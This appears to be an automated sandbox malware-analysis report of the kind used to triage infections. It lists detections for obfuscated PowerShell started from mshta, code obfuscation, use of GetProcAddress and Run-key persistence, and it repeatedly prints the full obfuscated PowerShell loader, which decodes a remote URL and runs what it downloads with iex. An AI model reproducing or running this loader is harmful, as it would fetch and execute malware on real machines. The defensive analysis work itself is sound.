';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 16_2_004044A4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02D90E75 push esi; iretd 1_2_02D90E9A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02D93A64 push ebx; retf 1_2_02D93ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_075D6B05 push 0000C33Dh; ret 1_2_075D6B4B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_075D08C2 push eax; mov dword ptr [esp], ecx 1_2_075D0AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22CA1E0F push ds; retf 0022h 10_2_22CA1E12
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22CA1219 push esp; iretd 10_2_22CA121A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22CA1E2C push ds; retf 0022h 10_2_22CA1E32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C92806 push ecx; ret 10_2_22C92819
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22CA1DFD push ds; retf 0022h 10_2_22CA1DFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC228D push cs; iretd 10_2_03AC224C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC2A15 pushad ; ret 10_2_03AC2A16
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC2213 push cs; iretd 10_2_03AC224C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC424A push ecx; iretd 10_2_03AC4255
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC21BE push cs; iretd 10_2_03AC224C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC45EA push edi; iretd 10_2_03AC45ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC0D00 push 929B4AF7h; retf 10_2_03AC0D31
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC04B0 push ecx; iretd 10_2_03AC0515
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC341A push cs; ret 10_2_03AC341B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044693D push ecx; ret 16_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044DB70 push eax; ret 16_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044DB70 push eax; ret 16_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00451D54 push eax; ret 16_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00451D34 push eax; ret 19_2_00451D41
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00444E71 push ecx; ret 19_2_00444E81
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00414060 push eax; ret 22_2_00414074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00414060 push eax; ret 22_2_0041409C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00414039 push ecx; ret 22_2_00414049
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004164EB push 0000006Ah; retf 22_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00416553 push 0000006Ah; retf 22_2_004165C4
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Straddlers Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Straddlers Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 19_2_004047CB
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
